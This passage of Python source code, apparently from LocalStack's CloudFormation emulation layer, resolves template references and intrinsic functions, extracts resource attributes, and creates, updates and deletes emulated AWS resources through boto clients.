        return name
    # try to extract name via resource class
    res_type = canonical_resource_type(get_resource_type(resource))
    model_class = RESOURCE_MODELS.get(res_type)
    if model_class:
        instance = model_class(resource)
        name = instance.get_resource_name()
    if not name:
        LOG.debug('Unable to extract name for resource type "%s"' % res_type)
    return name
def get_client(resource, func_config):
    """Return a boto client (or resource object) for the service backing *resource*.

    func_config may set 'boto_client': 'resource' to request the higher-level
    boto resource API. Raises for resource types with no deployment config;
    returns None (after logging) when the client cannot be created.
    """
    resource_type = get_resource_type(resource)
    service = get_service_name(resource)
    resource_config = get_deployment_config(resource_type)
    if resource_config is None:
        raise Exception('CloudFormation deployment for resource type %s not yet implemented' % resource_type)
    try:
        if func_config.get('boto_client') == 'resource':
            return aws_stack.connect_to_resource(service)
        return aws_stack.connect_to_service(service)
    except Exception as e:
        LOG.warning('Unable to get client for "%s" API, skipping deployment: %s' % (service, e))
        return None
def describe_stack_resource(stack_name, logical_resource_id):
    """Return the StackResourceDetail dict for a resource, or None (after logging) on error."""
    client = aws_stack.connect_to_service('cloudformation')
    try:
        result = client.describe_stack_resource(StackName=stack_name, LogicalResourceId=logical_resource_id)
        return result['StackResourceDetail']
    except Exception as e:
        LOG.warning('Unable to get details for resource "%s" in CloudFormation stack "%s": %s' %
            (logical_resource_id, stack_name, e))
def retrieve_resource_details(resource_id, resource_status, resources, stack_name):
    """Fetch the current deployed state of a resource.

    Resolution order: (1) the resource model class's fetch_and_update_state(),
    (2) the raw Properties for stack parameters, (3) the moto resource status
    stored on the stack. Returns None when the state cannot be determined;
    DependencyNotYetSatisfied from the model lookup is swallowed (returns None)
    so callers can retry later.
    """
    resource = resources.get(resource_id)
    # prefer the physical ID from the status record when available
    resource_id = resource_status.get('PhysicalResourceId') or resource_id
    if not resource:
        resource = {}
    resource_type = get_resource_type(resource)
    resource_props = resource.get('Properties')
    if resource_props is None:
        raise Exception('Unable to find properties for resource "%s": %s %s' % (resource_id, resource, resources))
    try:
        # try to look up resource class
        canonical_type = canonical_resource_type(resource_type)
        resource_class = RESOURCE_MODELS.get(canonical_type)
        if resource_class:
            instance = resource_class(resource)
            state = instance.fetch_and_update_state(stack_name=stack_name, resources=resources)
            return state
        # special case for stack parameters
        if resource_type == 'Parameter':
            return resource_props
        # fallback: try accessing stack.moto_resource_statuses
        stack = find_stack(stack_name)
        moto_resource = stack.moto_resource_statuses.get(resource_id)
        if moto_resource:
            return moto_resource
        # if is_deployable_resource(resource):
        LOG.warning('Unexpected resource type %s when resolving references of resource %s: %s' %
            (resource_type, resource_id, resource))
    except DependencyNotYetSatisfied:
        return
    except Exception as e:
        # only log unexpected errors; "not found" is a normal pre-deployment state
        check_not_found_exception(e, resource_type, resource, resource_status)
    return None
def check_not_found_exception(e, resource_type, resource, resource_status=None):
    """Return True if *e* looks like a "not found" error; otherwise log a warning and return False."""
    # we expect this to be a "not found" exception
    markers = ['NoSuchBucket', 'ResourceNotFound', 'NoSuchEntity', 'NotFoundException',
        '404', 'not found', 'not exist']
    message = str(e)
    if any(marker in message for marker in markers):
        return True
    LOG.warning('Unexpected error retrieving details for resource %s: %s %s - %s %s' %
        (resource_type, e, ''.join(traceback.format_stack()), resource, resource_status))
    return False
def extract_resource_attribute(resource_type, resource_state, attribute, resource_id=None,
        resource=None, resources=None, stack_name=None):
    """Extract an attribute value (e.g. 'Ref', 'Arn', 'PhysicalResourceId', or a
    type-specific attribute like 'RootResourceId') from a resource's deployed state.

    Tries, in order: moto model objects, hard-coded per-resource-type logic,
    the raw state/properties dicts, the resource model class, and finally a
    generic Id/PhysicalResourceId/Ref fallback. May return None when nothing
    matches.
    """
    LOG.debug('Extract resource attribute: %s %s' % (resource_type, attribute))
    is_ref_attribute = attribute in ['PhysicalResourceId', 'Ref']
    is_ref_attr_or_arn = is_ref_attribute or attribute == 'Arn'
    resource = resource or {}
    if not resource and resources:
        resource = resources[resource_id]
    if not resource_state:
        resource_state = retrieve_resource_details(resource_id, {}, resources, stack_name) or {}
    # moto model objects expose state via physical_resource_id / get_cfn_attribute
    if isinstance(resource_state, MotoCloudFormationModel):
        if is_ref_attribute:
            res_phys_id = getattr(resource_state, 'physical_resource_id', None)
            if res_phys_id:
                return res_phys_id
        if hasattr(resource_state, 'get_cfn_attribute'):
            try:
                return resource_state.get_cfn_attribute(attribute)
            except Exception:
                pass
        raise Exception('Unable to extract attribute "%s" from "%s" model class %s' % (
            attribute, resource_type, type(resource_state)))
    # extract resource specific attributes
    resource_props = resource.get('Properties', {})
    if resource_type == 'Parameter':
        result = None
        param_value = resource_props.get('Value', resource.get('Value',
            resource_props.get('Properties', {}).get('Value')))
        if is_ref_attr_or_arn:
            result = param_value
        elif isinstance(param_value, dict):
            result = param_value.get(attribute)
        if result is not None:
            return result
        return ''
    elif resource_type == 'Lambda::Function':
        func_configs = resource_state.get('Configuration') or {}
        if is_ref_attr_or_arn:
            func_arn = func_configs.get('FunctionArn')
            if func_arn:
                return resolve_refs_recursively(stack_name, func_arn, resources)
            func_name = resolve_refs_recursively(stack_name, func_configs.get('FunctionName'), resources)
            return aws_stack.lambda_function_arn(func_name)
        else:
            return func_configs.get(attribute)
    elif resource_type == 'Lambda::Version':
        # qualified ARN: "<function ARN>:<version number>"
        if resource_state.get('Version'):
            return '%s:%s' % (resource_state.get('FunctionArn'), resource_state.get('Version').split(':')[-1])
    elif resource_type == 'DynamoDB::Table':
        actual_attribute = 'LatestStreamArn' if attribute == 'StreamArn' else attribute
        value = resource_state.get('Table', {}).get(actual_attribute)
        if value:
            return value
    elif resource_type == 'ApiGateway::RestApi':
        if is_ref_attribute:
            result = resource_state.get('id')
            if result:
                return result
        if attribute == 'RootResourceId':
            # look up the "/" resource of the REST API
            api_id = resource_state['id']
            resources = aws_stack.connect_to_service('apigateway').get_resources(restApiId=api_id)['items']
            for res in resources:
                if res['path'] == '/' and not res.get('parentId'):
                    return res['id']
    elif resource_type == 'ApiGateway::Resource':
        if is_ref_attribute:
            return resource_state.get('id')
    elif resource_type == 'ApiGateway::Deployment':
        if is_ref_attribute:
            return resource_state.get('id')
    elif resource_type == 'S3::Bucket':
        if is_ref_attr_or_arn:
            bucket_name = resource_props.get('BucketName')
            bucket_name = resolve_refs_recursively(stack_name, bucket_name, resources)
            if attribute == 'Arn':
                return aws_stack.s3_bucket_arn(bucket_name)
            return bucket_name
    elif resource_type == 'Elasticsearch::Domain':
        if attribute == 'DomainEndpoint':
            domain_status = resource_state.get('DomainStatus', {})
            result = domain_status.get('Endpoint')
            if result:
                return result
        if attribute in ['Arn', 'DomainArn']:
            domain_name = resource_props.get('DomainName') or resource_state.get('DomainName')
            return aws_stack.es_domain_arn(domain_name)
    elif resource_type == 'StepFunctions::StateMachine':
        if is_ref_attr_or_arn:
            return resource_state['stateMachineArn']
    elif resource_type == 'SNS::Topic':
        if is_ref_attribute and resource_state.get('TopicArn'):
            topic_arn = resource_state.get('TopicArn')
            return resolve_refs_recursively(stack_name, topic_arn, resources)
    elif resource_type == 'SQS::Queue':
        if is_ref_attr_or_arn:
            if attribute == 'Arn' and resource_state.get('QueueArn'):
                return resolve_refs_recursively(stack_name, resource_state.get('QueueArn'), resources)
            return aws_stack.get_sqs_queue_url(resource_props.get('QueueName'))
    # generic fallback: look for the attribute (or its lowerCamel variant) in
    # the state dict, then in the resource Properties, then via the model class
    attribute_lower = common.first_char_to_lower(attribute)
    result = resource_state.get(attribute) or resource_state.get(attribute_lower)
    if result is None and isinstance(resource, dict):
        result = resource_props.get(attribute) or resource_props.get(attribute_lower)
    if result is None:
        result = get_attr_from_model_instance(resource, attribute,
            resource_type=resource_type, resource_id=resource_id)
    if is_ref_attribute:
        for attr in ['Id', 'PhysicalResourceId', 'Ref']:
            if result is None:
                for obj in [resource_state, resource]:
                    result = result or obj.get(attr)
    return result
def canonical_resource_type(resource_type):
    """Return the fully-qualified resource type, adding the "AWS::" prefix if missing.

    Plain names without a "::" separator (e.g. "Parameter") are returned unchanged.
    """
    needs_prefix = '::' in resource_type and not resource_type.startswith('AWS::')
    return 'AWS::%s' % resource_type if needs_prefix else resource_type
def get_attr_from_model_instance(resource, attribute, resource_type, resource_id=None):
    """Resolve `attribute` via the model class registered for `resource_type`.

    Returns None if no model class is known, or if the model raises while
    computing the attribute (best-effort lookup).
    """
    resource_type = canonical_resource_type(resource_type)
    # TODO: remove moto.MODEL_MAP here
    # prefer LocalStack's own resource models, fall back to moto's model map
    model_class = RESOURCE_MODELS.get(resource_type) or parsing.MODEL_MAP.get(resource_type)
    if not model_class:
        if resource_type not in ['AWS::Parameter', 'Parameter']:
            LOG.debug('Unable to find model class for resource type "%s"' % resource_type)
        return
    try:
        inst = model_class(resource_name=resource_id, resource_json=resource)
        return inst.get_cfn_attribute(attribute)
    except Exception:
        # model may raise for unsupported attributes - treat as "not resolvable here"
        pass
def resolve_ref(stack_name, ref, resources, attribute):
    """Resolve a reference (`Ref`/`Fn::GetAtt` target) to a concrete value.

    Pseudo parameters (AWS::Region, AWS::StackName, ...) are handled first;
    otherwise the referenced stack resource is looked up and the requested
    `attribute` is extracted from it. Raises DependencyNotYetSatisfied when
    the referenced resource's details cannot be fetched yet.
    """
    if ref == 'AWS::Region':
        return aws_stack.get_region()
    if ref == 'AWS::Partition':
        return 'aws'
    if ref == 'AWS::StackName':
        return stack_name
    if ref == 'AWS::StackId':
        # TODO return proper stack id!
        return stack_name
    if ref == 'AWS::AccountId':
        return TEST_AWS_ACCOUNT_ID
    if ref == 'AWS::NoValue':
        return PLACEHOLDER_AWS_NO_VALUE
    if ref == 'AWS::NotificationARNs':
        # TODO!
        return {}
    if ref == 'AWS::URLSuffix':
        return AWS_URL_SUFFIX
    # identity-style attributes resolve to the resource's physical ID
    is_ref_attribute = attribute in ['Ref', 'PhysicalResourceId', 'Arn']
    if is_ref_attribute:
        resolve_refs_recursively(stack_name, resources.get(ref, {}), resources)
        return determine_resource_physical_id(resource_id=ref,
            resources=resources, attribute=attribute, stack_name=stack_name)
    # fast path: attribute may already be stored directly on the resource entry
    if resources.get(ref):
        if isinstance(resources[ref].get(attribute), (str, int, float, bool, dict)):
            return resources[ref][attribute]
    # fetch resource details
    resource_new = retrieve_resource_details(ref, {}, resources, stack_name)
    if not resource_new:
        raise DependencyNotYetSatisfied(resource_ids=ref,
            message='Unable to fetch details for resource "%s" (resolving attribute "%s")' % (ref, attribute))
    resource = resources.get(ref)
    resource_type = get_resource_type(resource)
    result = extract_resource_attribute(resource_type, resource_new, attribute,
        resource_id=ref, resource=resource, resources=resources, stack_name=stack_name)
    if result is None:
        LOG.warning('Unable to extract reference attribute "%s" from resource: %s %s' %
            (attribute, resource_new, resource))
    return result
# Using a @prevent_stack_overflow decorator here to avoid infinite recursion
# in case we load stack exports that have circular dependencies (see issue 3438)
# TODO: Potentially think about a better approach in the future
@prevent_stack_overflow(match_parameters=True)
def resolve_refs_recursively(stack_name, value, resources):
    """Recursively resolve intrinsic functions (Ref, Fn::*) inside `value`.

    Dicts and lists are mutated in place; the (possibly replaced) resolved
    value is returned. Raises DependencyNotYetSatisfied when a referenced
    resource cannot be resolved yet.
    """
    if isinstance(value, dict):
        keys_list = list(value.keys())
        # a single-key dict may be an intrinsic function, e.g. {'Fn::Join': [...]}
        stripped_fn_lower = keys_list[0].lower().split('::')[-1] if len(keys_list) == 1 else None
        # process special operators
        if keys_list == ['Ref']:
            ref = resolve_ref(stack_name, value['Ref'], resources, attribute='Ref')
            if ref is None:
                msg = 'Unable to resolve Ref for resource "%s" (yet)' % value['Ref']
                LOG.debug('%s - %s' % (msg, resources.get(value['Ref']) or set(resources.keys())))
                raise DependencyNotYetSatisfied(resource_ids=value['Ref'], message=msg)
            ref = resolve_refs_recursively(stack_name, ref, resources)
            return ref
        if stripped_fn_lower == 'getatt':
            # Fn::GetAtt accepts either "Resource.Attribute" or [Resource, Attribute]
            attr_ref = value[keys_list[0]]
            attr_ref = attr_ref.split('.') if isinstance(attr_ref, str) else attr_ref
            return resolve_ref(stack_name, attr_ref[0], resources, attribute=attr_ref[1])
        if stripped_fn_lower == 'join':
            join_values = value[keys_list[0]][1]
            join_values = [resolve_refs_recursively(stack_name, v, resources) for v in join_values]
            none_values = [v for v in join_values if v is None]
            if none_values:
                raise Exception('Cannot resolve CF fn::Join %s due to null values: %s' % (value, join_values))
            return value[keys_list[0]][0].join([str(v) for v in join_values])
        if stripped_fn_lower == 'sub':
            item_to_sub = value[keys_list[0]]
            # pseudo parameters are made available as implicit substitution variables
            attr_refs = dict([(r, {'Ref': r}) for r in STATIC_REFS])
            if not isinstance(item_to_sub, list):
                item_to_sub = [item_to_sub, {}]
            result = item_to_sub[0]
            item_to_sub[1].update(attr_refs)
            for key, val in item_to_sub[1].items():
                val = resolve_refs_recursively(stack_name, val, resources)
                result = result.replace('${%s}' % key, val)
            # resolve placeholders
            result = resolve_placeholders_in_string(result, stack_name=stack_name, resources=resources)
            return result
        if stripped_fn_lower == 'findinmap':
            attr = resolve_refs_recursively(stack_name, value[keys_list[0]][1], resources)
            result = resolve_ref(stack_name, value[keys_list[0]][0], resources, attribute=attr)
            if not result:
                raise Exception('Cannot resolve fn::FindInMap: %s %s' % (value[keys_list[0]], list(resources.keys())))
            key = value[keys_list[0]][2]
            if not isinstance(key, str):
                key = resolve_refs_recursively(stack_name, key, resources)
            return result.get(key)
        if stripped_fn_lower == 'importvalue':
            import_value_key = resolve_refs_recursively(stack_name, value[keys_list[0]], resources)
            if config.USE_MOTO_CF:
                exports = cloudformation_backends[aws_stack.get_region()].exports
                export = exports[import_value_key]
                return export.value
            stack = find_stack(stack_name)
            return stack.exports_map[import_value_key]['Value']
        if stripped_fn_lower == 'if':
            condition, option1, option2 = value[keys_list[0]]
            condition = evaluate_condition(stack_name, condition, resources)
            return resolve_refs_recursively(stack_name, option1 if condition else option2, resources)
        if stripped_fn_lower == 'not':
            condition = value[keys_list[0]][0]
            condition = resolve_refs_recursively(stack_name, condition, resources)
            return not condition
        if stripped_fn_lower == 'equals':
            operand1, operand2 = value[keys_list[0]]
            operand1 = resolve_refs_recursively(stack_name, operand1, resources)
            operand2 = resolve_refs_recursively(stack_name, operand2, resources)
            # comparison is done on string representations
            return str(operand1) == str(operand2)
        if stripped_fn_lower == 'select':
            index, values = value[keys_list[0]]
            index = resolve_refs_recursively(stack_name, index, resources)
            values = resolve_refs_recursively(stack_name, values, resources)
            return values[index]
        if stripped_fn_lower == 'split':
            delimiter, string = value[keys_list[0]]
            delimiter = resolve_refs_recursively(stack_name, delimiter, resources)
            string = resolve_refs_recursively(stack_name, string, resources)
            return string.split(delimiter)
        if stripped_fn_lower == 'getazs':
            # returns a fixed list of four AZs ("a".."d") for the given/current region
            region = resolve_refs_recursively(stack_name, value['Fn::GetAZs'], resources) or aws_stack.get_region()
            azs = []
            for az in ('a', 'b', 'c', 'd'):
                azs.append('%s%s' % (region, az))
            return azs
        if stripped_fn_lower == 'base64':
            value_to_encode = value[keys_list[0]]
            value_to_encode = resolve_refs_recursively(stack_name, value_to_encode, resources)
            return to_str(base64.b64encode(to_bytes(value_to_encode)))
        # no intrinsic function - resolve all entries of the dict recursively
        for key, val in dict(value).items():
            value[key] = resolve_refs_recursively(stack_name, val, resources)
    if isinstance(value, list):
        for i in range(len(value)):
            value[i] = resolve_refs_recursively(stack_name, value[i], resources)
    return value
def resolve_placeholders_in_string(result, stack_name=None, resources=None):
    """Resolve ${...} placeholders (from Fn::Sub) in the given string.

    Supports "${Resource.Attribute}" and "${LogicalResourceId}" references;
    unresolvable placeholders are left unchanged in the output.
    """
    def _replace(match):
        parts = match.group(1).split('.')
        if len(parts) == 2:
            # "${Resource.Attribute}" style reference
            resolved = resolve_ref(stack_name, parts[0].strip(), resources, attribute=parts[1].strip())
            if resolved is None:
                raise DependencyNotYetSatisfied(resource_ids=parts[0],
                    message='Unable to resolve attribute ref %s' % match.group(1))
            return resolved
        if len(parts) == 1 and parts[0] in resources:
            # "${LogicalResourceId}" style reference - resolves like a "Ref"
            resource_json = resources[parts[0]]
            result = extract_resource_attribute(resource_json.get('Type'), {}, 'Ref',
                resources=resources, resource_id=parts[0], stack_name=stack_name)
            if result is None:
                raise DependencyNotYetSatisfied(resource_ids=parts[0],
                    message='Unable to resolve attribute ref %s' % match.group(1))
            return result
        # TODO raise exception here?
        return match.group(0)
    regex = r'\$\{([^\}]+)\}'
    result = re.sub(regex, _replace, result)
    return result
def evaluate_condition(stack_name, condition, resources):
    """Evaluate a CloudFormation condition value against the given stack resources."""
    # resolve any intrinsic functions first, then dereference the (condition)
    # name itself, then resolve once more in case the deref produced new refs
    partially_resolved = resolve_refs_recursively(stack_name, condition, resources)
    dereferenced = resolve_ref(stack_name, partially_resolved, resources, attribute='Ref')
    return resolve_refs_recursively(stack_name, dereferenced, resources)
def evaluate_resource_condition(resource, stack_name, resources):
    """Return False if the resource carries a "Condition" that evaluates falsy, else True."""
    condition_name = resource.get('Condition')
    if not condition_name:
        # no condition attached - resource is always deployed
        return True
    outcome = evaluate_condition(stack_name, condition_name, resources)
    is_falsy = outcome is False or outcome in FALSE_STRINGS or is_none_or_empty_value(outcome)
    return not is_falsy
def get_stack_parameter(stack_name, parameter):
    """Return the value of the named stack parameter, or None if unavailable."""
    try:
        client = aws_stack.connect_to_service('cloudformation')
        stacks = client.describe_stacks(StackName=stack_name)['Stacks']
    except Exception:
        # stack may not exist (yet) - treat as "no value"
        return None
    if not stacks:
        return None
    matches = [p['ParameterValue'] for p in stacks[0]['Parameters'] if p['ParameterKey'] == parameter]
    return matches[0] if matches else None
def update_resource(resource_id, resources, stack_name):
    """Apply an UPDATE to a single stack resource, if its type supports updates."""
    resource = resources[resource_id]
    res_type = get_resource_type(resource)
    if res_type not in UPDATEABLE_RESOURCES:
        LOG.warning('Unable to update resource type "%s", id "%s"' % (res_type, resource_id))
        return
    LOG.info('Updating resource %s of type %s' % (resource_id, res_type))
    model_class = RESOURCE_MODELS.get(canonical_resource_type(res_type))
    if not model_class:
        # no model registered for this type - nothing we can do
        return
    instance = model_class(resource)
    return instance.update_resource(resource, stack_name=stack_name, resources=resources)
def fix_account_id_in_arns(params):
    """Rewrite account IDs inside any ARN strings found (recursively) in `params`."""
    def _fix(obj, **kwargs):
        if isinstance(obj, dict):
            # patch string values of dicts in place
            for key, val in obj.items():
                if common.is_string(val, exclude_binary=True):
                    obj[key] = aws_stack.fix_account_id_in_arns(val)
            return obj
        if common.is_string(obj, exclude_binary=True):
            return aws_stack.fix_account_id_in_arns(obj)
        return obj
    return common.recurse_object(params, _fix)
def convert_data_types(func_details, params):
    """Convert data types in the "params" object, with the type defs
    specified in the 'types' attribute of "func_details". """
    type_map = func_details.get('types') or {}
    attr_names = type_map.keys() or []
    def _coerce(value, target_type):
        # only bool/str/int conversions are supported; other types pass through
        if target_type == bool:
            return value in ['True', 'true', True]
        if target_type == str:
            return str(value)
        if target_type == int:
            return int(value)
        return value
    def _fix_types(obj, **kwargs):
        if isinstance(obj, dict):
            for key, val in obj.items():
                if key in attr_names:
                    obj[key] = _coerce(val, type_map[key])
        return obj
    return common.recurse_object(params, _fix_types)
# TODO remove this method
def prepare_template_body(req_data):
    """Thin delegation to template_preparer.prepare_template_body (kept for callers)."""
    return template_preparer.prepare_template_body(req_data)
def deploy_resource(resource_id, resources, stack_name):
    """Create the given stack resource by running the generic CREATE action."""
    return execute_resource_action(resource_id, resources, stack_name, ACTION_CREATE)
def delete_resource(resource_id, resources, stack_name):
    """Delete the given stack resource, performing resource-specific cleanup first.

    Handles special cases (S3 bucket notifications, IAM role policies/instance
    profiles, EC2 VPC route tables) before delegating to the generic DELETE action.
    Uses `.get('PhysicalResourceId')` throughout, since the key may be missing
    for resources that never deployed successfully.
    """
    res = resources[resource_id]
    res_type = res.get('Type')
    if res_type == 'AWS::S3::Bucket':
        # drop any bucket notification configs to avoid dangling references
        s3_listener.remove_bucket_notification(res.get('PhysicalResourceId'))
    if res_type == 'AWS::IAM::Role':
        role_name = res.get('PhysicalResourceId') or res.get('Properties', {}).get('RoleName')
        try:
            iam_client = aws_stack.connect_to_service('iam')
            # inline policies and instance profile associations must be removed
            # before the role itself can be deleted
            rs = iam_client.list_role_policies(RoleName=role_name)
            for policy in rs['PolicyNames']:
                iam_client.delete_role_policy(RoleName=role_name, PolicyName=policy)
            rs = iam_client.list_instance_profiles_for_role(RoleName=role_name)
            for instance_profile in rs['InstanceProfiles']:
                ip_name = instance_profile['InstanceProfileName']
                iam_client.remove_role_from_instance_profile(
                    InstanceProfileName=ip_name,
                    RoleName=role_name
                )
            # iam_client.delete_instance_profile(
            #     InstanceProfileName=ip_name
            # )
        except Exception as e:
            # tolerate roles that have already been removed
            if 'NoSuchEntity' not in str(e):
                raise
    if res_type == 'AWS::EC2::VPC':
        state = res.get('_state_') or {}
        # fall back to the VPC ID recorded in the fetched state
        physical_resource_id = res.get('PhysicalResourceId') or state.get('VpcId')
        res['PhysicalResourceId'] = physical_resource_id
        if state.get('VpcId'):
            ec2_client = aws_stack.connect_to_service('ec2')
            # delete non-main route tables first, as they block VPC deletion
            resp = ec2_client.describe_route_tables(
                Filters=[
                    {'Name': 'vpc-id', 'Values': [state.get('VpcId')]},
                    {'Name': 'association.main', 'Values': ['false']}
                ]
            )
            for rt in resp['RouteTables']:
                ec2_client.delete_route_table(RouteTableId=rt['RouteTableId'])
    if res_type == 'AWS::EC2::Subnet':
        state = res.get('_state_') or {}
        physical_resource_id = res.get('PhysicalResourceId') or state.get('SubnetId')
        res['PhysicalResourceId'] = physical_resource_id
    if res_type == 'AWS::EC2::RouteTable':
        ec2_client = aws_stack.connect_to_service('ec2')
        resp = ec2_client.describe_vpcs()
        vpcs = [vpc['VpcId'] for vpc in resp['Vpcs']]
        vpc_id = res.get('Properties', {}).get('VpcId')
        if vpc_id not in vpcs:
            # VPC already deleted before
            return
    return execute_resource_action(resource_id, resources, stack_name, ACTION_DELETE)
def execute_resource_action_fallback(action_name, resource_id, resources, stack_name, resource, resource_type):
    """Handle a deployment action via moto's CloudFormation models (CREATE only)."""
    # using moto as fallback for now - TODO remove in the future!
    msg = 'Action "%s" for resource type %s not yet implemented' % (action_name, resource_type)
    long_type = canonical_resource_type(resource_type)
    clazz = parsing.MODEL_MAP.get(long_type)
    if not clazz:
        # no moto model available either - nothing we can do
        LOG.warning(msg)
        return
    LOG.info('%s - using fallback mechanism' % msg)
    if action_name == ACTION_CREATE:
        resource_name = get_resource_name(resource) or resource_id
        result = clazz.create_from_cloudformation_json(resource_name, resource, aws_stack.get_region())
        return result
def execute_resource_action(resource_id, resources, stack_name, action_name):
    """Run the given deployment action (create/delete/...) for a single resource.

    Looks up the deployment config for the resource type; each configured step
    is either a Python callable or a declarative AWS SDK call description.
    Returns the result of the first step (or None).
    """
    resource = resources[resource_id]
    resource_type = get_resource_type(resource)
    func_details = get_deployment_config(resource_type)
    if not func_details or action_name not in func_details:
        if resource_type in ['Parameter']:
            # parameters require no deployment action
            return
        return execute_resource_action_fallback(action_name,
            resource_id, resources, stack_name, resource, resource_type)
    LOG.debug('Running action "%s" for resource type "%s" id "%s"' % (action_name, resource_type, resource_id))
    func_details = func_details[action_name]
    func_details = func_details if isinstance(func_details, list) else [func_details]
    results = []
    for func in func_details:
        if callable(func['function']):
            # custom Python function performing the deployment step
            result = func['function'](resource_id, resources, resource_type, func, stack_name)
            results.append(result)
            continue
        client = get_client(resource, func)
        if client:
            # declarative step: invoke the named boto client method
            result = configure_resource_via_sdk(resource_id, resources, resource_type, func, stack_name, action_name)
            results.append(result)
    return (results or [None])[0]
def fix_resource_props_for_sdk_deployment(resource_type, resource_props):
    """Normalize `resource_props` in place so they pass botocore's request validation."""
    if resource_type == 'Lambda::Function':
        # botocore requires env variable values to be strings, see
        # botocore/data/lambda/2015-03-31/service-2.json:1161 (EnvironmentVariableValue)
        # https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-lambda-function-environment.html
        if 'Environment' in resource_props:
            env = resource_props['Environment']
            env['Variables'] = {key: str(val) for key, val in env.get('Variables', {}).items()}
    if resource_type == 'SQS::Queue':
        # wait time must be an integer - https://github.com/localstack/localstack/issues/3004
        if 'ReceiveMessageWaitTimeSeconds' in resource_props:
            resource_props['ReceiveMessageWaitTimeSeconds'] = int(resource_props['ReceiveMessageWaitTimeSeconds'])
    if resource_type == 'KMS::Key':
        # the API expects a JSON string policy and explicit flag/description defaults
        resource_props['KeyPolicy'] = json.dumps(resource_props.get('KeyPolicy', {}))
        resource_props['Enabled'] = resource_props.get('Enabled', True)
        resource_props['EnableKeyRotation'] = resource_props.get('EnableKeyRotation', False)
        resource_props['Description'] = resource_props.get('Description', '')
def configure_resource_via_sdk(resource_id, resources, resource_type, func_details, stack_name, action_name):
    """Execute one declarative deployment step by calling the described boto method.

    `func_details` describes the client function to invoke and how to map
    CloudFormation resource properties to API call parameters. Returns the
    boto call result (or None if the step is skipped).
    """
    resource = resources[resource_id]
    if resource_type == 'EC2::Instance':
        if action_name == 'create':
            # EC2 instance creation goes through the boto3 "resource" API
            func_details['boto_client'] = 'resource'
    client = get_client(resource, func_details)
    function = getattr(client, func_details['function'])
    params = func_details.get('parameters') or lambda_get_params()
    defaults = func_details.get('defaults', {})
    resource_props = resource['Properties'] = resource.get('Properties', {})
    # work on a copy, so prop fixes below don't leak into the stored template
    resource_props = dict(resource_props)
    # Validate props for each resource type
    fix_resource_props_for_sdk_deployment(resource_type, resource_props)
    if callable(params):
        params = params(resource_props, stack_name=stack_name, resources=resources, resource_id=resource_id)
    else:
        # it could be a list ['param1', 'param2', {'apiCallParamName': 'cfResourcePropName'}]
        if isinstance(params, list):
            _params = {}
            for param in params:
                if isinstance(param, dict):
                    _params.update(param)
                else:
                    _params[param] = param
            params = _params
        params = dict(params)
        # map each API parameter to the first resolvable resource property
        for param_key, prop_keys in dict(params).items():
            params.pop(param_key, None)
            if not isinstance(prop_keys, list):
                prop_keys = [prop_keys]
            for prop_key in prop_keys:
                if prop_key == PLACEHOLDER_RESOURCE_NAME:
                    params[param_key] = PLACEHOLDER_RESOURCE_NAME
                else:
                    if callable(prop_key):
                        prop_value = prop_key(resource_props, stack_name=stack_name,
                            resources=resources, resource_id=resource_id)
                    else:
                        prop_value = resource_props.get(prop_key, resource.get(prop_key))
                    if prop_value is not None:
                        params[param_key] = prop_value
                        break
    # replace PLACEHOLDER_RESOURCE_NAME in params
    resource_name_holder = {}
    def fix_placeholders(o, **kwargs):
        if isinstance(o, dict):
            for k, v in o.items():
                if v == PLACEHOLDER_RESOURCE_NAME:
                    # compute the resource name lazily, at most once
                    if 'value' not in resource_name_holder:
                        resource_name_holder['value'] = get_resource_name(resource) or resource_id
                    o[k] = resource_name_holder['value']
        return o
    common.recurse_object(params, fix_placeholders)
    # assign default values if empty
    params = common.merge_recursive(defaults, params)
    # this is an indicator that we should skip this resource deployment, and return
    if params is None:
        return
    # convert refs and boolean strings
    for param_key, param_value in dict(params).items():
        if param_value is not None:
            param_value = params[param_key] = resolve_refs_recursively(stack_name, param_value, resources)
            # Convert to boolean (TODO: do this recursively?)
            if str(param_value).lower() in ['true', 'false']:
                params[param_key] = str(param_value).lower() == 'true'
    # convert any moto account IDs (123456789012) in ARNs to our format (000000000000)
    params = fix_account_id_in_arns(params)
    # convert data types (e.g., boolean strings to bool)
    params = convert_data_types(func_details, params)
    # remove None values, as they usually raise boto3 errors
    params = remove_none_values(params)
    # run pre-actions
    run_pre_create_actions(action_name, resource_id, resources, resource_type, stack_name, params)
    # invoke function
    try:
        LOG.debug('Request for resource type "%s" in region %s: %s %s' % (
            resource_type, aws_stack.get_region(), func_details['function'], params))
        result = function(**params)
    except Exception as e:
        if action_name == 'delete' and check_not_found_exception(e, resource_type, resource):
            # deleting something that is already gone is fine
            return
        LOG.warning('Error calling %s with params: %s for resource: %s' % (function, params, resource))
        raise e
    # run post-actions
    run_post_create_actions(action_name, resource_id, resources, resource_type, stack_name, result)
    return result
# TODO: move as individual functions to RESOURCE_TO_FUNCTION
def run_pre_create_actions(action_name, resource_id, resources, resource_type, stack_name, resource_params):
    """Run resource-specific preparation steps before the main deployment call."""
    resource = resources[resource_id]
    resource_props = resource['Properties'] = resource.get('Properties', {})
    if resource_type == 'IAM::Role' and action_name == ACTION_DELETE:
        # managed policies must be detached before the role can be deleted
        iam = aws_stack.connect_to_service('iam')
        role_name = resource_props['RoleName']
        for policy in iam.list_attached_role_policies(RoleName=role_name).get('AttachedPolicies', []):
            iam.detach_role_policy(RoleName=role_name, PolicyArn=policy['PolicyArn'])
    if resource_type == 'S3::Bucket' and action_name == ACTION_DELETE:
        s3 = aws_stack.connect_to_service('s3')
        bucket_name = resource_props.get('BucketName')
        try:
            s3.delete_bucket_policy(Bucket=bucket_name)
        except Exception:
            # best-effort; bucket or policy may not exist
            pass
        # TODO: verify whether AWS CF automatically deletes all bucket objects, or fails if bucket is non-empty
        try:
            delete_all_s3_objects(bucket_name)
        except Exception as e:
            if 'NoSuchBucket' not in str(e):
                raise
        # hack: make sure the bucket actually exists, to prevent delete_bucket operation later on from failing
        s3.create_bucket(Bucket=bucket_name)
# TODO: move as individual functions to RESOURCE_TO_FUNCTION
def run_post_create_actions(action_name, resource_id, resources, resource_type, stack_name, result):
    """Run resource-specific follow-up steps after a successful create/update call.

    `result` is the return value of the main deployment call (used, e.g., to
    obtain the new REST API ID). No-op for DELETE actions.
    """
    if action_name == ACTION_DELETE:
        return result
    resource = resources[resource_id]
    resource_props = resource['Properties'] = resource.get('Properties', {})
    # some resources have attached/nested resources which we need to create recursively now
    if resource_type == 'ApiGateway::Method':
        integration = resource_props.get('Integration')
        apigateway = aws_stack.connect_to_service('apigateway')
        if integration:
